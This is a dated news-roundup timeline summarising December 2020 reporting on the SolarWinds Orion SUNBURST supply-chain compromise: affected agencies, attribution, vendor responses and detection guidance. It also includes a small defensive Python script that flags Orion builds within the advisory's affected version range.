Federal officials issued an urgent warning Thursday that the hackers who were working for a foreign government and penetrated deep into government systems had used a wider variety of techniques in their cyber-offensive and they warned that the hacking was a grave risk to the federal government.

Ref - NYTimes

_______________________________________________________________________________________

(December 17, 2020)

Additional Analysis into the SUNBURST Backdoor

An interesting observation was the check for the presence of SolarWinds' Improvement Client executable and its version "3.0.0.382". The ImprovementClient is a program that can collect considerable information, such as the count of Orion user accounts by authentication method and data about the devices and applications monitored.

Ref - McAfee

_______________________________________________________________________________________

(December 17, 2020)

SolarWinds supply chain-type attacks demand global cybersecurity response

Brad Smith, the President of Microsoft, has provided some clarifications as well as recommendations regarding the recent attacks. This latest cyber-assault is effectively an attack on the United States and its government and other critical institutions, including security firms. It illuminates the need for sharing information and best practices and coordinating not just on cybersecurity protection but on defensive measures and responses.

Ref - Microsoft

_______________________________________________________________________________________

(December 17, 2020)

The US establishes 'Cyber Unified Coordination Group' to respond to SolarWinds attack

A joint statement yesterday from the US FBI, CISA, and ODNI says that the Government has invoked Presidential Policy Directive (PPD) 41 to establish a Cyber Unified Coordination Group to coordinate a whole-of-Government response to the Russian cyber operation that exploited SolarWinds' Orion platform.


_______________________________________________________________________________________

(December 17, 2020)


The SolarWinds hack targeted government agencies, critical infrastructure, and private sector organizations

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of the compromises of U.S. government agencies, critical infrastructure entities, and private sector organizations by an APT actor beginning in at least March 2020. This APT actor has demonstrated patience, operational security, and complex tradecraft in these intrusions.

Ref - US-CERT

_______________________________________________________________________________________

(December 17, 2020)


Attackers used unknown tactics to penetrate the U.S government networks

Federal investigators presented evidence of previously unknown tactics for penetrating government computer networks. In one documented intrusion at a U.S. think tank, the attackers first gained access to the networks using multiple tools, backdoors, and malware implants, and exploited a vulnerability in Microsoft Exchange's Control Panel (ECP) component.


_______________________________________________________________________________________

(December 17, 2020)

SolarWinds SUNBURST backdoor assessment

The SolarWinds Orion Platform is the market leader among network monitoring platforms, with SolarWinds having over 275,000 customers in 190 countries and providing network monitoring for 400 of the Fortune 500, the US government, and other high-profile organizations.


_______________________________________________________________________________________

(December 17, 2020)


Nuclear weapons agency breached in SolarWinds attack

The Energy Department and National Nuclear Security Administration (NNSA), which maintains the U.S. nuclear weapons stockpile, have evidence that hackers accessed their networks as part of an extensive espionage operation that has affected at least half a dozen federal agencies. The hackers were able to access the networks belonging to a core part of the U.S. national security enterprise.

Ref - Politico

_______________________________________________________________________________________

(December 17, 2020)


Hacker behind SolarWinds attack breached the US nuclear weapons agency

The hacking group behind the SolarWinds compromise also hacked the networks of the US nuclear weapons agency. The federal investigators have found evidence of hackers gaining access to US DOE and NNSA networks as part of the ongoing US govt compromise attack campaign.


_______________________________________________________________________________________

(December 17, 2020)


The sophistication and scope of SolarWinds attack

The suspected Russian hack that compromised parts of the U.S. government was executed with a scope and sophistication that has surprised even veteran security experts and exposed a potentially critical vulnerability in America’s technology infrastructure. The operation is part of a broader, previously undetected cyber-espionage campaign that may stretch back years.

Ref - WSJ

_______________________________________________________________________________________

(December 17, 2020)


Microsoft confirmed that it was breached in SolarWinds supply chain attack

According to a Reuters report, the state-sponsored hackers who breached US software provider SolarWinds earlier this year pivoted to Microsoft's internal network and then used Microsoft's own products to further the attacks against other companies. Separately, CISA said it has evidence of initial access vectors other than the SolarWinds Orion platform.

Ref - ZDNet

_______________________________________________________________________________________

(December 17, 2020)


State-sponsored hackers breached a US think tank three times

A hacking group believed to be working for the Russian government has compromised the internal network of a think tank in the U.S. three times. The attacks, which took place between late 2019 and July 2020, are attributed to a threat actor named Dark Halo, which quickly switched between different tactics and techniques to carry out long-term, stealthy operations.


_______________________________________________________________________________________

(December 17, 2020)


Microsoft identifies 40 more precise targets in 'ongoing' SolarWinds hack

Microsoft's president warned that the wide-ranging hack of SolarWinds' Orion IT software is ongoing, and that the investigation reveals an attack that is remarkable for its scope, sophistication, and impact. The breach targeted several US government agencies and is believed to have been carried out by Russian nation-state hackers.

Ref - The Verge

_______________________________________________________________________________________

(December 17, 2020)


Microsoft denies infecting others in SolarWinds hack

Microsoft has confirmed that it was hacked in the recent SolarWinds attacks but denied that its software was compromised in a supply-chain attack to infect customers. The denial responds to a report claiming that Microsoft was not only compromised in the SolarWinds supply-chain attack but also had its software modified to distribute malicious files to its clients.


_______________________________________________________________________________________

(December 17, 2020)


SolarWinds is not alone in a suspected Russian hack

The massive hacking campaign disclosed by U.S. officials this week and tentatively attributed to the Russian government extended beyond users of pervasive network software that had been compromised. Another major technology supplier was also compromised by the same attack team and used to get into high-value final targets.

Ref - CNBC

_______________________________________________________________________________________

(December 17, 2020)


Key safeguards for IT supply chains were missing - US Watchdogs

According to the report by the U.S. Government Accountability Office, 14 out of the 23 surveyed federal agencies hadn’t implemented any of the foundational practices meant to protect their information and communications technology supply chains. The surveyed agencies also included Commerce, Treasury, and State, which were targeted in the recent hacks.

Ref - Fortune

_______________________________________________________________________________________

(December 17, 2020)


Senators question IRS about SolarWinds hack

A bipartisan pair of senior senators have asked the Internal Revenue Service (IRS) to provide them with a briefing about the SolarWinds hack, suspecting that personal taxpayer information may have been stolen in the breach. They asked for details about how the IRS was mitigating potential damage and ensuring the hackers did not obtain access to internal IRS systems.


_______________________________________________________________________________________

(December 16, 2020)


More details on SolarWinds supply-chain attack

FireEye shared more details of its compromise and broke the news that it fell victim to a supply-chain attack involving the IT services company SolarWinds. The SolarWinds Orion software update had a backdoor (SUNBURST) injected into its code, which SolarWinds believes was included in updates released between March and June 2020.


_______________________________________________________________________________________

(December 16, 2020)


Hackers obtained 'God Access' during the SolarWinds hack

A former White House official has warned that the SolarWinds breach potentially gave hackers "God access" or a "God door" to computer systems using the Orion IT software. On a scale of one to 10, this attack has been assigned a score of 9 by the former White House chief information officer.

Ref - Newsweek 

_______________________________________________________________________________________

(December 16, 2020)


Tech firms have collaborated to create a kill switch for SolarWinds backdoor

Microsoft, FireEye, and GoDaddy have collaborated to create a kill switch for the SolarWinds Sunburst backdoor that forces the malware to terminate itself. Using the takeover of avsvmcloud[.]com, they created a kill switch that unloads the Sunburst malware on infected machines.


_______________________________________________________________________________________

(December 16, 2020)

Nearly a hundred suspected victims of the SolarWinds breach identified

Security researchers are saying that they have made progress in decoding SUNBURST’s obfuscated communications methods. Chinese cybersecurity firm RedDrip Team published its findings on GitHub, saying its decoder tool had identified nearly a hundred suspected victims of the SolarWinds/Orion breach, including universities, governments, and high-tech companies.


_______________________________________________________________________________________

(December 16, 2020)


SolarWinds hack - one of the biggest hacks ever

According to researchers, this hack, named Sunburst, is one of the biggest cyber-attacks ever, and it could take years to fully comprehend it. It is said that the security teams across all affected organizations could take months trying to identify which emails were read, which documents were stolen, or which passwords were compromised in the hack.

Ref - BBC

_______________________________________________________________________________________

(December 16, 2020)

Recommendations for monitoring SolarWinds supply chain attack with Sumo Logic Cloud SIEM

In this blog, Sumo Logic provides recommendations for its customers on how to utilize available Indicators of Compromise (IOCs) within its Cloud SIEM offering to determine their exposure to the attack.


_______________________________________________________________________________________

(December 16, 2020)


SolarWinds/Orion compromise – Immediate action recommended

Optiv has created this list of recommendations to help reduce exposure to the SolarWinds supply chain attack.

Ref - Optiv

_______________________________________________________________________________________

(December 16, 2020)


Why is the SolarWinds hack keeping security experts awake at night?

According to CNN, the SolarWinds attacks are very concerning for several reasons. First, besides the three high-profile federal agencies already compromised, there is a huge range of potential victims. Second, the attackers appear to have been extraordinarily skilled and determined. Third, the attackers used an unusual and creative technique: disguising the initial attack within legitimate software updates issued by SolarWinds.

Ref - CNN

_______________________________________________________________________________________

(December 16, 2020)


Hackers leveraged SolarWinds' dominance against it for their spy campaign

The Texas-based company SolarWinds has been providing some level of monitoring or management to almost every kind of database or IT deployment model in use. Hackers turned this dominance into a liability, and cybersecurity experts are still struggling to understand the scope of the damage.

Ref - Reuters

_______________________________________________________________________________________

(December 16, 2020)


A security expert reported misconfiguration in SolarWinds' software in 2019

A security researcher said he warned SolarWinds in 2019 that the IT company's update server could be accessed by using the password "solarwinds123". The revelation comes days after a massive hack of the Austin-based SolarWinds was made public, an attack that has since been confirmed to have infiltrated US government agencies. It is still unclear which clients specifically were affected by the hack.


_______________________________________________________________________________________

(December 16, 2020)


No other products were compromised in a recent hack according to SolarWinds

IT software company SolarWinds has said that no other products were identified to contain malicious code similar to the one found in the Orion platform. The company's statement comes after it carried out an internal audit of all its applications, following news that Russian state-sponsored hackers had breached its internal network and inserted malware into Orion, its network monitoring and inventory platform.

Ref - ZDNet

_______________________________________________________________________________________

(December 16, 2020)


U.S. Senators ask for details from FBI on SolarWinds supply chain attack

A bipartisan group of U.S. senators has requested a government-wide report into the "highly sophisticated" cyberattack on SolarWinds from the FBI and the Cybersecurity and Infrastructure Security Agency (CISA).

Ref - Newsweek

_______________________________________________________________________________________

(December 16, 2020)


Microsoft announces plans to quarantine SolarWinds apps

Microsoft announced plans to start forcibly blocking and isolating versions of the SolarWinds Orion app that are known to have contained the Solorigate (SUNBURST) malware. Microsoft said that from December 16 at 8:00 AM PST, Microsoft Defender Antivirus will begin blocking the known malicious SolarWinds binaries. This will quarantine the binary even if the process is running.

Ref - ZDNet

_______________________________________________________________________________________

(December 15, 2020)


SolarWinds cyberattack leaves U.K. infrastructure exposed

It has been claimed that the cyber-attack on the U.S. technology company SolarWinds, which has left U.K. infrastructure exposed, including the Home Office, National Health Service (NHS), and police forces, could take months to remove from affected systems.

Ref - Newsweek 

_______________________________________________________________________________________

(December 15, 2020)


SolarWinds hack may have a big impact on the D.C. contractors

In addition to high-profile federal agencies such as the Defense, Justice and State departments, and the Office of the President of the United States, SolarWinds also named prominent contractors such as Lockheed Martin Corp, General Dynamics Corp, and Booz Allen Hamilton Corp. among its customers. The scope of the intrusion is suspected to be broader than that of the earlier intrusion aimed at the Office of Personnel Management (OPM).


_______________________________________________________________________________________

(December 15, 2020)


A hacker named 'Fxmsp' sold access to SolarWinds machines

Years before a SolarWinds security breach that compromised the networks of multiple federal government agencies, a notorious hacker attempted to sell access to the company's computers on underground forums. The hacker, known as "fxmsp," was one of several individuals who attempted to sell access to SolarWinds machines in online forums during 2017.

Ref - Newsweek

_______________________________________________________________________________________

(December 15, 2020)


Microsoft, along with industry partners, seized a key domain used in the SolarWinds hack

Microsoft and a coalition of tech companies have intervened to seize and sinkhole a domain that played a central role in the SolarWinds hack. The domain (avsvmcloud[.]com) served as a command and control (C&C) server for malware delivered to around 18,000 SolarWinds customers via a trojanized update for the company's Orion app.

Ref - ZDNet

_______________________________________________________________________________________

(December 15, 2020)


NATO is assessing the damage from SolarWinds supply chain attack

NATO, the Western military alliance, is assessing the damage caused to its communication networks as a result of a massive hack that has rocked global institutions, including multiple agencies of the U.S. federal government and neighboring Canada. SolarWinds software is used by a wide range of governments and organizations, including some entities in NATO.

Ref - Newsweek

_______________________________________________________________________________________

(December 15, 2020)


SolarWinds attackers used a clever way to bypass multi-factor authentication

The hackers behind the supply chain attack that compromised public and private organizations devised a clever way to bypass multi-factor authentication systems. After gaining administrator privileges on the infected network, they used those unfettered rights to steal a Duo secret key from a server running Outlook Web App.


_______________________________________________________________________________________

(December 15, 2020)


Recent Sunburst targeted attacks

Various sources have recently disclosed a sophisticated attack that hit organizations via the supply chain. This was carried out via a compromised version of a network monitoring application called SolarWinds Orion. The attackers used the access provided by this application to plant a backdoor known as Sunburst onto affected machines. Trend Micro has provided detailed technical analysis as well as IOCs related to this attack.


_______________________________________________________________________________________

(December 15, 2020)


Critical responses needed for all businesses after SolarWinds supply chain attack

The recent attacks on the U.S. Department of Homeland Security, Treasury Department, and FireEye are just scratching the surface of one of the most significant foreign hacking incidents in history. Over the long term, certain companies or agencies are likely to use this incident as a turning point to justify additional scrutiny of third-party software and safeguards against its abuse.


_______________________________________________________________________________________

(December 15, 2020)


More details of the SolarWinds attack emerge

A threat actor, likely Russia-based, is infecting thousands of organizations with malware delivered via seemingly legitimate software updates to SolarWinds' Orion network management product. All enterprises running the company's Orion network management software should assume compromise and respond accordingly.


_______________________________________________________________________________________

 

(December 15, 2020)


Microsoft ensuring customers are protected from Solorigate supply chain attack

Microsoft is monitoring a dynamic threat environment surrounding the discovery of a sophisticated attack that included compromised binaries from legitimate software. These binaries, which are related to the SolarWinds Orion Platform, could be used by attackers to remotely access devices.

Ref - Microsoft

_______________________________________________________________________________________

(December 15, 2020)


SolarWinds released the second hotfix for the Orion platform

SolarWinds officially released a second hotfix to address a critical vulnerability in its Orion platform that was exploited to insert malware and breach public and private entities in a wide-ranging espionage campaign. The company urged its customers to update Orion Platform to version 2020.2.1 HF 2 immediately.


_______________________________________________________________________________________

(December 15, 2020)


Thousands of businesses could have been affected by SolarWinds attack

Thousands of businesses and several branches of the US government are now thought to have been affected by the recent attack on software firm SolarWinds. The Austin-based company has fallen victim to a massive supply chain attack believed to be the work of state-sponsored hackers. It is suspected that over 18,000 organizations have used the affected version of its Orion platform.

Ref - TechRadar

_______________________________________________________________________________________

(December 15, 2020)

After news of SolarWinds breach, Capitol Hill turns attention to CISA

Cyber-savvy members of Congress were just beginning to respond, as of Tuesday morning, to news of breaches of at least three federal agencies’ networks by foreign hackers, but the early reaction from Capitol Hill focused on supporting the Cybersecurity and Infrastructure Security Agency to do more work to protect the government.

Ref - FedScoop
_______________________________________________________________________________________

(December 15, 2020)

SolarWinds attack explained: And why it was so hard to detect

A group believed to be Russia's Cozy Bear gained access to government and other systems through a compromised update to SolarWinds' Orion software. Most organizations aren't prepared for this sort of software supply chain attack.


_______________________________________________________________________________________

(December 15, 2020)

Five U.S. agencies hacked in a major Russian cyberespionage campaign

Three more organizations, namely the Department of Homeland Security, the State Department, and the National Institutes of Health have joined the list of known victims of a months-long, highly sophisticated digital spying operation by Russia. Its damage remains uncertain but is presumed to be extensive, experts say.


_______________________________________________________________________________________

(December 15, 2020)

AlienVault: SolarWinds SUNBURST IOCs

AlienVault has accumulated a list of indicators of compromise (IOCs) for the SolarWinds SUNBURST supply chain attack.


_______________________________________________________________________________________

(December 15, 2020)


Sunburst backdoor: What to look for in your logs now - interview with an incident responder

FireEye published a report about a global intrusion campaign that utilized a backdoor planted in SolarWinds Orion. Attackers gained access to the download servers of Orion. They managed to infect signed installers downloaded by Orion users, who had every reason to believe that the packages were safe and had not been tampered with.

Ref - Graylog

_______________________________________________________________________________________

(December 15, 2020)

SolarWinds hack could have affected 18K Customers

The still-unfolding breach at network management software firm SolarWinds may have resulted in malicious code being pushed to nearly 18,000 customers, the company said in a legal filing on Monday. It is said that on Dec. 14, the software giant gained control over a key domain name, avsvmcloud[.]com, that the SolarWinds hackers were using to communicate with systems compromised by the backdoored Orion product updates.


_______________________________________________________________________________________

(December 15, 2020)

Suspected Russian cybercriminals breached U.S. DHS

A group of sophisticated hackers, which is believed to be working for the Russian government, managed to get access to internal communications in the U.S. Department of Homeland Security, according to people familiar with the matter. The breach was part of the campaign that penetrated the U.S. departments of Treasury and Commerce.

Ref - Reuters

_______________________________________________________________________________________
(December 14, 2020)

Canada assessing SolarWinds hack as U.S. agencies lock down

Canadian security officials are eyeing a significant hack south of the border that appears to have penetrated top U.S. government agencies and left officials there scrambling to limit the damage.

_______________________________________________________________________________________

(December 14, 2020)

A backdoor inserted into SolarWinds' network monitoring software

The effects of the backdoor inserted into SolarWinds' network monitoring software on Britain's public sector are raising concerns, as tight-lipped government departments refuse to say whether UK institutions were accessed by Russian spies. It appears the downloads page for SolarWinds' platform was altered by Kremlin hackers.


_______________________________________________________________________________________

(December 14, 2020)


Adversaries infiltrated SolarWinds Orion software applications

In the past week the US Treasury, US Department of Commerce, and cybersecurity company FireEye experienced breaches tied to their reliance on software supply chains and a compromise of a SolarWinds software application. Officials stated that the exploit path demonstrated all signs of a nation-state sponsored cyberattack.

Ref - Sonatype

_______________________________________________________________________________________

(December 14, 2020)

The SolarWinds supply chain attack

Cisco Talos said that it is monitoring the announcements made by FireEye and Microsoft that a likely state-sponsored actor compromised potentially thousands of high-value government and private organizations around the world via the SolarWinds Orion product. The adversary gained access to victims’ networks via trojanized updates to SolarWinds’ Orion software.

Ref - Cisco

_______________________________________________________________________________________

(December 14, 2020)

US calls on federal agencies to power down SolarWinds Orion due to security breach

An emergency directive issued by the U.S. government calls on all federal civilian agencies to disconnect or power down SolarWinds Orion IT management tools because they are being used to facilitate an active exploit.

Ref - CRN

_______________________________________________________________________________________

(December 14, 2020)

Using Splunk to detect Sunburst backdoor

This blog contains some immediate guidance on using Splunk Core and Splunk Enterprise Security to protect (and detect activity on) your network from the Sunburst Backdoor malware delivered via SolarWinds Orion software.

Ref - Splunk

_______________________________________________________________________________________

(December 14, 2020)

SolarWinds SUNBURST backdoor supply chain attack: What you need to know

Rapid7 has deployed detections in InsightIDR for activity related to vulnerable versions of SolarWinds Orion and will continue to add additional IOCs/TTPs as they become available.


Ref - RAPID7

_______________________________________________________________________________________

(December 14, 2020)

Multiple U.S. agencies hit in cyberattack

The Pentagon, intelligence agencies, nuclear labs, and several Fortune 500 companies use software that was found to have been compromised by Russian hackers. The sweep of stolen data is still being assessed. Investigators were struggling to determine the extent to which entities were affected by the highly sophisticated attack.

Ref - NYTimes

_______________________________________________________________________________________

(December 14, 2020)

Dark Halo abuses SolarWinds tool to breach organizations

Volexity is releasing additional research and indicators associated with compromises impacting customers of the SolarWinds platform. Volexity has been able to tie these attacks to multiple incidents it worked in late 2019 and 2020 at a US-based think tank. Volexity tracks this threat actor under the name Dark Halo.

Ref - Volexity

_______________________________________________________________________________________

(December 14, 2020)


TrustedSec incident response team releases summary and guidance

In the wake of recent revelations regarding a supply chain compromise of the SolarWinds Orion platform by a nation-state actor, the TrustedSec Incident Response team has released a summary and guidance. The company revealed that the threat actor has been dubbed “UNC2452” by FireEye and the corresponding malware identified as “SUNBURST,” which has capabilities to deliver a memory-only dropper named “TEARDROP”.


_______________________________________________________________________________________

(December 14, 2020)


A disruptive cyber crisis affected multiple agencies

The sophisticated cyber campaign that breached email accounts across the federal government created a deepening crisis as signs multiplied about the scope of the foreign intruders’ reach. This is probably going to be one of the most consequential cyberattacks that happened in U.S. history. A new Cyber Response Group will activate a subsidiary body, known as a Unified Coordination Group, to streamline crisis collaboration between affected agencies.

Ref - Politico

_______________________________________________________________________________________

(December 14, 2020)

Around 18,000 customers were affected by the recent hack

Earlier, it was speculated that all of SolarWinds' customers were impacted. However, in SEC documents filed recently, SolarWinds said that of its 300,000 total customers, only 33,000 were using the Orion software platform, and fewer than 18,000 are believed to have installed the malware-laced update.

Ref - ZDNet

_______________________________________________________________________________________

(December 14, 2020)

SolarWinds just released a security advisory

SolarWinds has been made aware that some of their systems experienced a highly sophisticated, manual supply chain attack. The attack impacted SolarWinds Orion versions 2019.4 HF 5 through 2020.2.1. This attack was likely conducted by an outside nation-state and intended to be a narrow, extremely targeted, and manually executed attack.


_______________________________________________________________________________________

(December 14, 2020)

SolarWinds serves more than 425 Fortune 500 organizations

The suspected Russia-led cyberattack targeted IT monitoring software called Orion, developed by the company SolarWinds, with malware pushed via booby-trapped updates. SolarWinds names a large number of U.S. clients, including the Pentagon, State Department, NASA, NOAA, National Security Agency, Postal Service, Department of Justice, the Office of the President of the United States, and the top five U.S. accounting firms.

Ref - Newsweek

_______________________________________________________________________________________

(December 14, 2020)

US treasury and commerce departments targeted in cyber-attack

US federal agencies have been hacked in a way that may have allowed a foreign power to monitor government communications. The Treasury and Commerce departments have both been attacked, and all federal civilian agencies have been told to disconnect from SolarWinds Orion, a computer network tool being abused by hackers.

Ref - BBC

_______________________________________________________________________________________

(December 14, 2020)

Russian government hackers are behind the compromise of U.S. agencies

The Treasury and Commerce departments, along with other U.S. government agencies, have been breached by Russian government hackers as part of a global espionage campaign that stretches back months, according to people familiar with the matter. The breach was described as long-running and significant.


_______________________________________________________________________________________

(December 14, 2020)

Microsoft and FireEye verify SolarWinds supply chain attack

It has been identified that some hackers, believed to be operating on behalf of a foreign government, have breached software provider SolarWinds. After the breach, they deployed a malware-laced update for its Orion software to infect the networks of multiple US companies and government networks.

Ref - ZDNet

_______________________________________________________________________________________

(December 14, 2020)

US agencies examining the attack on government networks

The US Commerce Department has recently confirmed that it has been the victim of a data breach in a major cyber incident. In addition, the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency also confirmed the data security incident.

Ref - CNN

_______________________________________________________________________________________

(December 14, 2020)

US Treasury and Commerce departments breached

The U.S. Treasury Department and the U.S. Department of Commerce were victims of a cyber breach. It was a sophisticated attack and it is said that very few entities are capable of carrying out such attacks. Authorities are investigating who was behind the breach.

Ref - ABCNews

_______________________________________________________________________________________

(December 14, 2020)

The US calls on federal agencies to stop using SolarWinds Orion

The U.S. government has called on all federal civilian agencies to power down SolarWinds Orion products immediately. It has been identified that they are being used as part of an active security exploit. An emergency directive comes in response to a known compromise involving SolarWinds Orion products.

Ref - CRN

_______________________________________________________________________________________

(December 14, 2020)

U.S. agencies attacked by suspected Russian hackers

In one of the most audacious hacks in recent times, U.S. government agencies were attacked as part of a global campaign that exploited a flaw in the software updates of a U.S. company. The hackers are suspected to be part of a notorious hacking group tied to the Russian government.

Ref - Bloomberg

_______________________________________________________________________________________

(December 14, 2020)

The US government agencies attacked by hackers

U.S. government agencies were hit by a widespread campaign of cyber-attacks by hackers who were suspected of exploiting a flaw in the update of a U.S. software company, according to three people familiar with the investigation. The attacks included snooping on emails at the U.S. Treasury and Commerce Department.


_______________________________________________________________________________________

(December 14, 2020)

US agencies hacked in a months-long spying campaign

As a part of a months-long global cyber espionage campaign, some hackers broke into the networks of the Treasury and Commerce departments. This has been disclosed just a few days after the prominent cybersecurity firm FireEye said it had been breached in an attack that industry experts said bore the hallmarks of Russian tradecraft.

Ref - APNews

_______________________________________________________________________________________

(December 14, 2020)

SolarStorm and SUNBURST Customer Coverage

Any organization utilizing SolarWinds Orion IT management software is potentially at risk from this threat. These organizations should immediately identify Orion systems in their network, determine if they are compromised with the SUNBURST backdoor, and seek out further evidence of compromise.


_______________________________________________________________________________________

(December 14, 2020)

US treasury hacked by foreign attackers

A serious hack has been detected, which has led to a national security council meeting at the White House. According to the sources, hackers backed by a foreign government have been monitoring internal email traffic at the US treasury department and an agency that decides internet and telecommunications policy.


_______________________________________________________________________________________

(December 14, 2020)

US departments targeted in cyber-attack

US federal agencies have been hacked in a way that may have let a foreign power monitor government communications. All federal civilian agencies have been told to disconnect from SolarWinds Orion, which is being exploited by malicious hackers. SolarWinds has 300,000 global customers, including all five branches of the US military.

Ref - Yahoo

_______________________________________________________________________________________

(December 14, 2020)

Hackers breached the U.S. Treasury Department

Hackers linked to a foreign government have breached the systems belonging to the U.S. Treasury Department and the National Telecommunications and Information Administration (NTIA) within the Commerce Department. As a result of the incursion, some files were stolen from both agencies.

Ref - The Hill

_______________________________________________________________________________________

(December 14, 2020)

Hackers attacked the U.S. Treasury and Commerce departments

Hackers broke into the networks of US federal agencies, including the Treasury and Commerce departments. The attacks were revealed just days after U.S. officials warned that cyber actors linked to the Russian government were attempting to exploit vulnerabilities to target sensitive data. It appeared to be a large-scale penetration of U.S. government agencies.

Ref - Time

_______________________________________________________________________________________

(December 14, 2020)

Suspected Russian hackers hacked U.S. Treasury emails

According to people familiar with the matter, some hackers, believed to be working for Russia, have been monitoring internal email traffic in the U.S. Treasury and Commerce departments. They also added that it is feared these hacks are just the tip of the iceberg. The hack is so serious it led to a National Security Council meeting at the White House.

Ref - Reuters

_______________________________________________________________________________________

(December 13, 2020)

Microsoft releases security guide to stay protected from recent nation-state cyberattacks

Microsoft is sharing information and issuing guidance about increased activities from a sophisticated threat actor that is focused on high-value targets such as government agencies and cybersecurity companies. The firm believes this is nation-state activity on a significant scale, aimed at both the government and private sector.

Ref - Microsoft

_______________________________________________________________________________________

(December 13, 2020)

A global intrusion campaign abused widely-used IT infrastructure management software

A global campaign has been identified that compromises the networks of public and private organizations through the software supply chain. The compromise is delivered through updates to Orion, a widely used IT infrastructure management software from SolarWinds.

Ref - FireEye

_______________________________________________________________________________________

(December 13, 2020)

Hackers compromise SolarWinds Orion

SolarWinds Orion products (versions 2019.4 through 2020.2.1 HF1) are currently being exploited by malicious actors. CISA has determined that exploitation of SolarWinds products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action. 

Ref - DHS

_______________________________________________________________________________________

(December 13, 2020)

The active abuse of SolarWinds software

The Cybersecurity and Infrastructure Security Agency (CISA) said that it is aware of active exploitation of SolarWinds Orion Platform software versions 2019.4 HF 5 through 2020.2.1 HF 1, released between March 2020 and June 2020. CISA encourages affected organizations to read the SolarWinds and FireEye advisories for more information and FireEye’s GitHub page for detection countermeasures.

Ref - US-CERT
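As an added example (not code from the page, CISA, or SolarWinds): a small Python triage helper that parses Orion version strings in the "2019.4 HF 5" form and flags builds that fall inside the affected range the alert states. The inventory rows and the empty FIXED_BUILDS set are constructed assumptions; any vendor-fixed build released inside that numeric range should be listed in FIXED_BUILDS so it is not flagged.

```python
import re
from typing import List, Tuple

# Affected range exactly as stated in the CISA alert above.
AFFECTED_LOW = "2019.4 HF 5"
AFFECTED_HIGH = "2020.2.1 HF 1"

# Placeholder (assumption): builds the vendor has already fixed that still sort
# inside the numeric range. Populate from the vendor advisory; empty here.
FIXED_BUILDS: set = set()

# Matches "2020.2", "2020.2.1", "2019.4 HF 5", "2019.4 HF5" (case-insensitive).
_VERSION_RE = re.compile(r"^\s*(\d{4}(?:\.\d+){1,2})\s*(?:HF\s*(\d+))?\s*$", re.I)


def parse_orion_version(text: str) -> Tuple[int, int, int, int]:
    """Turn '2020.2.1 HF 1' into a comparable tuple (2020, 2, 1, 1).

    A missing third component and a missing hotfix both become 0, so
    '2020.2' sorts before '2020.2 HF 1', which sorts before '2020.2.1'.
    """
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised Orion version string: {text!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) < 3:
        parts.append(0)
    hotfix = int(m.group(2) or 0)
    return (parts[0], parts[1], parts[2], hotfix)


def is_in_affected_range(version: str) -> bool:
    """True if the build sits in the stated range and is not a known fixed build."""
    v = parse_orion_version(version)
    if v in {parse_orion_version(f) for f in FIXED_BUILDS}:
        return False
    return parse_orion_version(AFFECTED_LOW) <= v <= parse_orion_version(AFFECTED_HIGH)


def triage_inventory(inventory: List[Tuple[str, str]]) -> List[str]:
    """Return hostnames whose Orion build needs isolation and forensic review."""
    return [host for host, ver in inventory if is_in_affected_range(ver)]


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = [
    ("orion-prod-01", "2020.2.1 HF 1"),   # upper bound of the range: flagged
    ("orion-lab-02", "2019.4 HF5"),       # lower bound, no space before digit: flagged
    ("orion-legacy", "2019.2 HF 3"),      # predates the range: not flagged
    ("orion-patched", "2020.2.1 HF 2"),   # newer than the range: not flagged
]

if __name__ == "__main__":
    print(triage_inventory(SAMPLE_INVENTORY))
```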

_______________________________________________________________________________________

(December 13, 2020)

Highly invasive attacker abused SolarWinds supply chain

FireEye has uncovered a widespread campaign, which it tracks as UNC2452. The actor gained access to victims via trojanized updates to SolarWinds' Orion IT monitoring and management software in order to distribute malware that FireEye calls SUNBURST. This campaign may have begun as early as spring 2020 and is currently ongoing. FireEye is releasing signatures to detect this threat actor and supply chain attack in the wild.

Ref - FireEye

Posted on: December 14, 2020
